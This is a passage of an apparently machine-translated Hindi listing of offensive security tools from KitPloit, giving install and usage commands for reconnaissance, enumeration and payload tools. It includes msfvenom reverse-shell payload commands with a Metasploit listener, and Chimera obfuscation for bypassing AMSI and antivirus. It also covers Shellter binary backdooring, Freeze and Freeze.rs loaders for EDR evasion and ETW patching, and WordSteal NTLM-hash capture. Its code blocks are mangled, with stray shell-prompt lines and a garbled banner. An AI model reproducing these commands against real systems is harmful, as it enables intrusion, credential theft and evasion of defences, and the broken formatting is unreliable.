यह एक उपकरण है जो बलपूर्वक ब्राउज़िंग (Forced Browsing) निष्पादित करने के लिए डिज़ाइन किया गया है, एक ऐसा हमला जिसका उद्देश्य उन संसाधनों की गणना करना और उन तक पहुँचना है जो वेब अनुप्रयोग द्वारा संदर्भित नहीं हैं, लेकिन फिर भी एक हमलावर के लिए सुलभ हैं।

Feroxbuster लक्ष्य निर्देशिकाओं में असंबद्ध सामग्री की खोज करने के लिए एक वर्डलिस्ट के साथ ब्रूट फोर्स (brute force) का उपयोग करता है। ये संसाधन वेब अनुप्रयोगों और संचालन प्रणालियों के बारे में संवेदनशील जानकारी, जैसे स्रोत कोड, क्रेडेंशियल, आंतरिक नेटवर्क पतों आदि को संग्रहीत कर सकते हैं।

**स्थापित करें: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

स्थापित करें: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**इंस्टॉल करें: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

पूर्ण स्थापना निर्देशों के लिए यहाँ देखें।

उपयोग:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
पूर्ण उपयोग उदाहरण [यहाँ](https://epi052.github.io/feroxbuster-docs/docs/examples/) पाए जा सकते हैं।

![चित्र](https://assets.kitploit.com/production/public/readmes/495/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

_चित्र https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif से उपयोग किया गया_

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

एक उपकरण जो शीर्ष क्लाउड प्रदाताओं (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode) पर किसी कंपनी (लक्ष्य) के बुनियादी ढांचे, फ़ाइलों और ऐप्स को खोजने में मदद करता है।

विशेषताएँ:

- क्लाउड पहचान (IPINFO API और स्रोत कोड)
- तेज़ (समवर्ती)
- क्रॉस प्लेटफ़ॉर्म (विंडोज, लिनक्स, मैक)
- User-Agent रैंडमाइज़ेशन
- प्रॉक्सी रैंडमाइज़ेशन (HTTP, Socks5)

**स्थापना:**

अपने सिस्टम के लिए नवीनतम [रिलीज़](https://github.com/0xsha/CloudBrute/releases) डाउनलोड करें और उपयोग का पालन करें।

**उपयोग:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

https://github.com/0xsha/CloudBrute से ली गई छवि

🔙dnsrecon

dnsrecon एक python उपकरण है जो DNS रिकॉर्ड्स (MX, SOA, NS, A, AAAA, SPF और TXT) की गणना करने के लिए है और एक एकल डोमेन खोज से कई नए संबद्ध पीड़ित होस्ट प्रदान कर सकता है जिनमें प्रवेश किया जा सकता है।

स्थापना:```bash sudo apt install dnsrecon

root@kitploit:~
**उपयोग:**```bash
dnsrecon -d google.com

image

🔙shodan.io

Shodan सार्वजनिक बुनियादी ढांचे को क्रॉल करता है और इसे खोजने योग्य प्रारूप में प्रदर्शित करता है। कंपनी के नाम, डोमेन नाम, आईपी पते का उपयोग करके, shodan के माध्यम से आपके लक्ष्य से संबंधित संभावित कमजोर सिस्टम की खोज करना संभव है।

image

🔙AORT

उपडोमेन की गणना, DNS गणना, WAF पहचान, WHOIS, पोर्ट स्कैन, wayback machine, ईमेल हार्वेस्टिंग के लिए उपकरण।

स्थापना:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**उपयोग:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

एक प्रोग्राम जो जाँचता है कि क्या किसी डोमेन से स्पूफ किया जा सकता है। यह प्रोग्राम SPF और DMARC रिकॉर्ड्स की जाँच करता है कि क्या वे स्पूफिंग की अनुमति देने वाले कमजोर कॉन्फ़िगरेशन रखते हैं। इसके अतिरिक्त, यह सचेत करेगा यदि डोमेन में DMARC कॉन्फ़िगरेशन है जो विफल SPF/DKIM ईमेल पर मेल या HTTP अनुरोध भेजता है।

डोमेन स्पूफेबल हैं यदि निम्नलिखित में से कोई भी शर्त पूरी होती है:

  • SPF या DMARC रिकॉर्ड का अभाव
  • SPF रिकॉर्ड कभी ~all या -all निर्दिष्ट नहीं करता
  • DMARC नीति p=none पर सेट है या मौजूद नहीं है

इंस्टॉल:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**उपयोग:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump एक उपकरण है जो AWS S3 बकेट्स को तेजी से गणना करने और दिलचस्प फ़ाइलों की खोज करने के लिए है। यह एक सबडोमेन ब्रूटफ़ोर्सर के समान है लेकिन विशेष रूप से S3 बकेट्स के लिए बनाया गया है और इसमें कुछ अतिरिक्त सुविधाएँ भी हैं जो आपको फ़ाइलों में grep करने और साथ ही दिलचस्प फ़ाइलों को डाउनलोड करने की अनुमति देती हैं।

स्थापना:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**उपयोग:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

GitHub से regex के साथ जानकारी खोजने के लिए बढ़िया उपकरण, जिसमें विशिष्ट GitHub उपयोगकर्ताओं और/या परियोजनाओं को खोजने की क्षमता है।

इंस्टॉल करें:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**उपयोग:**```
./githarvester.py

🔙truffleHog

TruffleHog एक उपकरण है जो git रिपॉजिटरी को स्कैन करता है और उच्च-एंट्रॉपी स्ट्रिंग्स और पैटर्न की तलाश करता है जो रहस्यों की उपस्थिति का संकेत दे सकते हैं, जैसे पासवर्ड और API कुंजियाँ। TruffleHog के साथ, आप जल्दी और आसानी से संवेदनशील जानकारी पा सकते हैं जो गलती से कमिट और पुश की गई हो सकती है।

स्थापित करें (बाइनरी): लिंक

स्थापित करें (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**उपयोग:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap एक परिसंपत्ति खोज और पहचान उपकरण है। यह वेब/tcp/udp जैसे प्रोटोकॉल और फिंगरप्रिंट जानकारी की तेजी से पहचान कर सकता है, संपत्ति प्रकारों का पता लगा सकता है, और आंतरिक और बाहरी नेटवर्क के लिए उपयुक्त है।

Dismap के पास एक पूर्ण फिंगरप्रिंट नियम आधार है, जिसमें वर्तमान में tcp/udp/tls प्रोटोकॉल फिंगरप्रिंट और 4500+ वेब फिंगरप्रिंट नियम शामिल हैं, जो फ़ेविकॉन, बॉडी, हेडर आदि की पहचान कर सकते हैं।

स्थापना:

Dismap Linux, MacOS और Windows के लिए एक बाइनरी फ़ाइल है। चलाने के लिए संबंधित संस्करण डाउनलोड करने हेतु Release पर जाएँ:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**उपयोग:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

से उपयोग की गई छवि https://github.com/zhzyker/dismap

🔙enum4linux

Windows और Samba सिस्टम से जानकारी एकत्र करने का एक उपकरण।

इसका उपयोग कई प्रकार की जानकारी एकत्र करने के लिए किया जा सकता है, जिनमें शामिल हैं:

  • डोमेन और डोमेन नियंत्रक जानकारी
  • स्थानीय उपयोगकर्ता और समूह जानकारी
  • शेयर और शेयर अनुमतियाँ
  • सुरक्षा नीतियाँ
  • सक्रिय निर्देशिका जानकारी

स्थापित करें: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**स्थापित करें: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

उपयोग:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
पूर्ण उपयोग जानकारी इस [ब्लॉग](https://labs.portcullis.co.uk/tools/enum4linux/) में पाई जा सकती है।

![image](https://assets.kitploit.com/production/public/readmes/495/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

_https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/ से ली गई छवि_

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

खतरनाक रूप से तेज़ dns/network/port स्कैनर, [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc) द्वारा बनाया गया, rust में लिखा गया।

आपको एक उपडोमेन फ़ाइल की आवश्यकता होगी। _उदा. [Sublist3r द्वारा उपडोमेन शब्द सूची](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)_.

**स्थापना:**

नवीनतम रिलीज़ [यहाँ](https://github.com/Esc4iCEscEsc/skanuvaty/releases) से डाउनलोड करें।```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

उपयोग:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![चित्र](https://assets.kitploit.com/production/public/readmes/495/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

_इमेज का उपयोग किया गया: https://github.com/Esc4iCEscEsc/skanuvaty_

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor एक इंटेलिजेंस टूल है, इसका लक्ष्य OSINT कार्यों और अधिक को बिना किसी API कुंजी के करना है।

**मुख्य विशेषताएँ:**

- IP पता, ASN और संगठन के बारे में जानकारी खोजना।
- IP/CIDR पर rustscan, masscan और nmap को अधिक कुशलतापूर्वक चलाने के लिए रैपर।
- प्रमाणपत्र, whois, Google Analytics आदि विभिन्न तकनीकों को लागू करके लक्ष्य के अधिक संबंधित डोमेन ढूँढना।
- IP पते के बारे में सारांश प्राप्त करें (द्वारा संचालित [@thebl4ckturtle](https://github.com/theblackturtle))

**स्थापना:**```bash
go install github.com/j3ssie/metabigor@latest

उपयोग:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

_से ली गई छवि https://github.com/j3ssie/metabigor_

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob एक उपकरण है जो Github पर सार्वजनिक रिपॉजिटरी में धकेले गए संभावित संवेदनशील फाइलों को खोजने में मदद करता है।

Gitrob किसी उपयोगकर्ता या संगठन से संबंधित रिपॉजिटरी को कॉन्फ़िगरेबल गहराई तक क्लोन करेगा और कमिट इतिहास के माध्यम से पुनरावृति करेगा और उन फाइलों को चिह्नित करेगा जो संभावित संवेदनशील फाइलों के हस्ताक्षर से मेल खाती हैं।

परिणामों को आसान ब्राउज़िंग और विश्लेषण के लिए एक वेब इंटरफ़ेस के माध्यम से प्रस्तुत किया जाएगा।

**नोट:** _Gitrob को Github API के साथ इंटरैक्ट करने के लिए एक Github एक्सेस टोकन की आवश्यकता होगी। [एक व्यक्तिगत एक्सेस टोकन बनाएं](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) और इसे अपने .bashrc या समान शेल कॉन्फ़िगरेशन फ़ाइल में एक पर्यावरण चर में सहेजें:_```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

स्थापित करें: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**इंस्टॉल: (बाइनरी)**

प्रत्येक रिलीज़ के लिए एक [प्री-कम्पाइल्ड संस्करण](https://github.com/michenriksen/gitrob/releases) उपलब्ध है।

**उपयोग:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

चित्र https://www.uedbox.com/post/58828/ से लिया गया

🔙gowitness

Gowitness एक वेबसाइट स्क्रीनशॉट उपयोगिता है जो Golang में लिखी गई है, जो Chrome Headless का उपयोग करके कमांड लाइन के माध्यम से वेब इंटरफेस के स्क्रीनशॉट उत्पन्न करती है, और परिणामों को संसाधित करने के लिए एक सुविधाजनक रिपोर्ट व्यूअर के साथ आती है। Linux और macOS दोनों समर्थित हैं, Windows समर्थन अधिकतर काम करता है।

स्थापना: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
पूर्ण स्थापना जानकारी [यहाँ](https://github.com/sensepost/gowitness/wiki/Installation) पाई जा सकती है।

**उपयोग:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

पूर्ण उपयोग जानकारी यहाँ पाई जा सकती है।

image

छवि https://github.com/sensepost/gowitness से ली गई है

संसाधन विकास

🔙Chimera

Chimera एक PowerShell अस्पष्टीकरण स्क्रिप्ट है जो AMSI और एंटीवायरस समाधानों को बायपास करने के लिए डिज़ाइन की गई है। यह AV को ट्रिगर करने के लिए ज्ञात दुर्भावनापूर्ण PS1's को डाइजेस्ट करती है और सामान्य डिटेक्शन सिग्नेचर से बचने के लिए स्ट्रिंग प्रतिस्थापन और चर सम्मिलन का उपयोग करती है।

स्थापना:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**उपयोग:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

Msfvenom विभिन्न ऑपरेटिंग सिस्टमों के लिए कई प्रकार के फॉर्मेट में पेलोड बनाने की अनुमति देता है। यह AV बाईपास के लिए पेलोड के अस्पष्टीकरण का भी समर्थन करता है।

लिसनर सेट करें```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### Msfvenom कमांड्स

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

विंडोज़:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**लिनक्स:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

चित्र

🔙Shellter

Shellter एक गतिशील शेलकोड इंजेक्शन उपकरण है, और अब तक बनाया गया पहला वास्तविक गतिशील PE इन्फेक्टर है।

इसका उपयोग मूल विंडोज़ अनुप्रयोगों (वर्तमान में केवल 32-बिट अनुप्रयोग) में शेलकोड इंजेक्ट करने के लिए किया जा सकता है।

Shellter PE फ़ाइल की मूल संरचना का लाभ उठाता है और कोई भी संशोधन लागू नहीं करता जैसे कि अनुभागों में मेमोरी एक्सेस अनुमतियाँ बदलना (जब तक उपयोगकर्ता नहीं चाहता), RWE एक्सेस के साथ एक अतिरिक्त अनुभाग जोड़ना, और वह सब जो AV स्कैन के अंतर्गत संदिग्ध लगे।

पूर्ण README जानकारी यहाँ पाई जा सकती है।

स्थापना: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**Install: (Windows)**

[डाउनलोड पृष्ठ](https://www.shellterproject.com/download/) पर जाएँ और स्थापित करें।

**उपयोग:**

बस एक वैध बाइनरी चुनें जिसमें बैकडोर डालना है और Shellter चलाएँ।

कुछ अच्छे टिप्स [यहाँ](https://www.shellterproject.com/tipstricks/) पाए जा सकते हैं।

समुदाय द्वारा बनाए गए कई उपयोग डेमो [यहाँ](https://www.shellterproject.com/shellter-community-demos/) मिल सकते हैं।

![image](https://assets.kitploit.com/production/public/readmes/495/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

_https://www.kali.org/tools/shellter/images/shellter.png से ली गई छवि_

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze एक पेलोड निर्माण उपकरण है जिसका उपयोग EDR सुरक्षा नियंत्रणों को दरकिनार करके शेलकोड को गुप्त रूप से निष्पादित करने के लिए किया जाता है।

Freeze एकाधिक तकनीकों का उपयोग करता है, न केवल Userland EDR हुक्स को हटाने के लिए, बल्कि शेलकोड को इस तरह से निष्पादित करने के लिए भी कि वह अन्य एंडपॉइंट निगरानी नियंत्रणों को दरकिनार कर सके।

**स्थापना:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

उपयोग:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

_चित्र https://www.blackhatethicalhacking.com/tools/freeze/ से लिया गया है_

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

यह स्क्रिप्ट एक Microsoft Word दस्तावेज़ बनाएगी जिसमें एक रिमोट इमेज होगी, जो किसी रिमोट पीड़ित एंडपॉइंट से NTML हैश कैप्चर करने की अनुमति देगी।

Microsoft Word में रिमोट स्थानों से इमेज शामिल करने की क्षमता है, जिसमें एक हमलावर-नियंत्रित SMB सर्वर पर होस्ट की गई रिमोट इमेज भी शामिल है। यह आपको प्रमाणित पीड़ित द्वारा Word दस्तावेज़ खोलने और इमेज को रेंडर करने पर भेजे गए NTLM हैश को सुनने और कैप्चर करने का अवसर देता है।

**स्थापना:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

उपयोग:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

_चित्र https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/ से लिया गया_

---

### [🔙](#tool-list)[Freeze.rs](https://github.com/optiv/Freeze.rs.git)

यदि आप इस फ्रेमवर्क में उपयोग की गई तकनीकों के बारे में अधिक जानना चाहते हैं, तो कृपया SourceZero Blog और मूल टूल को देखें।

**विवरण:**

Freeze.rs एक पेलोड निर्माण उपकरण है जिसका उपयोग EDR सुरक्षा नियंत्रणों को दरकिनार करके शेलकोड को गुप्त रूप से निष्पादित करने के लिए किया जाता है। Freeze.rs कई तकनीकों का उपयोग करता है जो न केवल Userland EDR हुक्स को हटाती हैं, बल्कि शेलकोड को इस तरह से निष्पादित करती हैं कि यह अन्य एंडपॉइंट मॉनिटरिंग नियंत्रणों को भी दरकिनार कर देता है।

**एक सस्पेंडेड प्रक्रिया बनाना:**

जब एक प्रक्रिया बनाई जाती है, Ntdll.dll पहली DLL है जो लोड होती है; यह किसी भी EDR DLL के लोड होने से पहले होता है। इसका मतलब है कि EDR के लोड होने और सिस्टम DLLs की असेंबली को हुक और संशोधित करने में थोड़ी देरी होती है। Windows syscalls को Ntdll.dll में देखने पर, हम देख सकते हैं कि अभी तक कुछ भी हुक नहीं किया गया है। यदि हम एक प्रक्रिया को सस्पेंड स्थिति (समय में जमी हुई) में बनाते हैं, तो हम देख सकते हैं कि Ntdll.dll के अलावा कोई अन्य DLL लोड नहीं होती है। आप यह भी देख सकते हैं कि कोई EDR DLL लोड नहीं है, जिसका अर्थ है कि Ntdll.dll में स्थित syscalls अपरिवर्तित हैं।

![image](https://assets.kitploit.com/production/public/readmes/495/bd6869a0876e06b636a0ab2814e3a2353a4dd7954834e3d79c3b2b44a03c27a4.png)

**एड्रेस स्पेस लेआउट रैंडमाइजेशन**

इस साफ सस्पेंडेड प्रक्रिया का उपयोग Freeze.rs लोडर से हुक्स को हटाने के लिए करने हेतु, हमें प्रोग्रामेटिक रूप से साफ सस्पेंडेड प्रक्रिया की मेमोरी को खोजने और पढ़ने का एक तरीका चाहिए। यहीं पर एड्रेस स्पेस लेआउट रैंडमाइजेशन (ASLR) काम आता है। ASLR एक सुरक्षा तंत्र है जो स्टैक मेमोरी करप्शन-आधारित कमजोरियों को रोकता है। ASLR प्रक्रिया के अंदर एड्रेस स्पेस को रैंडमाइज़ करता है, ताकि सभी मेमोरी-मैप की गई वस्तुएं, स्टैक, हीप, और स्वयं निष्पादन योग्य प्रोग्राम अद्वितीय हों। अब, यहीं पर यह दिलचस्प हो जाता है क्योंकि जबकि ASLR काम करता है, यह पोजीशन-इंडिपेंडेंट कोड जैसे DLLs के लिए काम नहीं करता है। DLLs (विशेष रूप से ज्ञात सिस्टम DLLs) के साथ क्या होता है कि बूट समय पर एक बार एड्रेस स्पेस रैंडमाइज़ किया जाता है। इसका मतलब है कि हमें किसी रिमोट प्रक्रिया की जानकारी को गणना करने की आवश्यकता नहीं है ताकि उसके ntdll.dll का बेस एड्रेस खोज सकें, क्योंकि यह सभी प्रक्रियाओं में समान होता है, जिसमें वह प्रक्रिया भी शामिल है जिसे हम नियंत्रित करते हैं। चूंकि प्रत्येक DLL का पता प्रति बूट एक ही स्थान पर होता है, हम इस जानकारी को अपनी प्रक्रिया से प्राप्त कर सकते हैं और सस्पेंडेड प्रक्रिया से पता खोजने के लिए कभी भी गणना नहीं करनी पड़ती।

![image](https://assets.kitploit.com/production/public/readmes/495/2e982f594ca0dc518cb32bf3ff1e2803416c699a0fe3f067b1d521276352f53d.png)

इस जानकारी के साथ, हम API ReadProcessMemory का उपयोग करके किसी प्रक्रिया की मेमोरी पढ़ सकते हैं। यह API कॉल आमतौर पर किसी भी क्रेडेंशियल-आधारित हमले के भाग के रूप में LSASS को पढ़ने से जुड़ा होता है; हालांकि, अपने आप में यह स्वाभाविक रूप से दुर्भावनापूर्ण नहीं है, खासकर यदि हम केवल मेमोरी का एक मनमाना भाग पढ़ रहे हैं। ReadProcessMemory को संदिग्ध के रूप में चिह्नित किए जाने का एकमात्र समय तब है जब आप कुछ ऐसा पढ़ रहे हैं जो आपको नहीं पढ़ना चाहिए (जैसे LSASS की सामग्री)। EDR उत्पादों को कभी भी ReadProcessMemory को कॉल किए जाने के तथ्य को चिह्नित नहीं करना चाहिए, क्योंकि इस फ़ंक्शन के वैध परिचालन उपयोग हैं और इससे कई झूठी सकारात्मकताएं उत्पन्न होंगी।

हम इसे एक कदम आगे ले जा सकते हैं केवल Ntdll.dll के उस भाग को पढ़कर जहां सभी syscalls संग्रहीत हैं - इसका .text सेक्शन, पूरी DLL को पढ़ने के बजाय।

इन तत्वों को संयोजित करके, हम शेलकोड निष्पादित करने से पहले अपने मौजूदा हुक किए गए .text सेक्शन को ओवरराइट करने के लिए Ntdll.dll के .text सेक्शन की एक प्रति प्रोग्रामेटिक रूप से प्राप्त कर सकते हैं।

**ETW पैचिंग**

ETW इस टेलीमेट्री को उत्पन्न करने के लिए बिल्ट-इन syscalls का उपयोग करता है। चूंकि ETW भी Windows में निर्मित एक मूल सुविधा है, सुरक्षा उत्पादों को जानकारी तक पहुंचने के लिए ETW syscalls को "हुक" करने की आवश्यकता नहीं है। परिणामस्वरूप, ETW को रोकने के लिए, Freeze.rs कई ETW syscalls को पैच करता है, रजिस्टरों को फ्लश करता है और निष्पादन प्रवाह को अगले निर्देश पर लौटाता है। ETW पैचिंग अब सभी लोडरों में डिफ़ॉल्ट है।

**शेलकोड**

![image](https://assets.kitploit.com/production/public/readmes/495/896ef4933a6d5762f9b019a2b557d49af151890f979736ca6c710c856b3d8b94.png)

Rust के NTAPI crate के साथ, आप देख सकते हैं कि ये सभी कॉल ntdll.dll के अंतर्गत दिखाई नहीं देते हैं, हालांकि वे प्रक्रिया के भीतर अभी भी मौजूद हैं।

![image](https://assets.kitploit.com/production/public/readmes/495/8fb4ee66b377c99c51144b36ef80b7f8e795c0197296959ed89161f57838a4c0.png)

परिणामस्वरूप:

![image](https://assets.kitploit.com/production/public/readmes/495/a8a1bbb194d7e417c9961540376fcb92dc4092b4cbe524cc5c58ce820cb24568.png)

![image](https://assets.kitploit.com/production/public/readmes/495/8a5ddf3aebb2e87f5226d6cde7414adde2d0f4485ddee6aa82170484d8967bd4.png)

**Rust क्यों?**

यह Rust सीखने के लिए एक मजेदार प्रोजेक्ट के रूप में शुरू हुआ और अपने स्वयं के फ्रेमवर्क में विकसित हो गया है।

**योगदान**

Freeze.rs Rust में विकसित किया गया था।

**स्थापना**

यदि Rust और Rustup स्थापित नहीं हैं तो कृपया उन्हें स्थापित करें। यदि आप इसे OSX या Linux से संकलित कर रहे हैं तो सुनिश्चित करें कि आपने लक्ष्य "x86_64-pc-windows-gnu" जोड़ा है। ऐसा करने के लिए निम्नलिखित कमांड चलाएं:

एक बार हो जाने पर आप Freeze.rs संकलित कर सकते हैं, निम्नलिखित कमांड चलाएं, या संकलित बाइनरी का उपयोग करें:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release

वहाँ से संकलित संस्करण target/release में में मिलेगा (ध्यान दें कि यदि आप --release नहीं डालते तो फ़ाइल target/debug/ में होगी )```bash ___________ _ /_ ____ ____ ________ ____ _______ ______ | ) _ __ _/ __ _/ __ \_ // __ \ _ __ / / | \ | | /\ /\ / / /\ / | | /_
_
/ |
| _
>_
>
___ \___ > /\ |__| /____ > / / / / / / / (@Tyl0us) Soon they will learn that revenge is a dish... best served COLD & Rusty...

USAGE: Freeze-rs [FLAGS] [OPTIONS]

FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information

OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.

root@kitploit:~
**बाइनरी बनाम DLL**
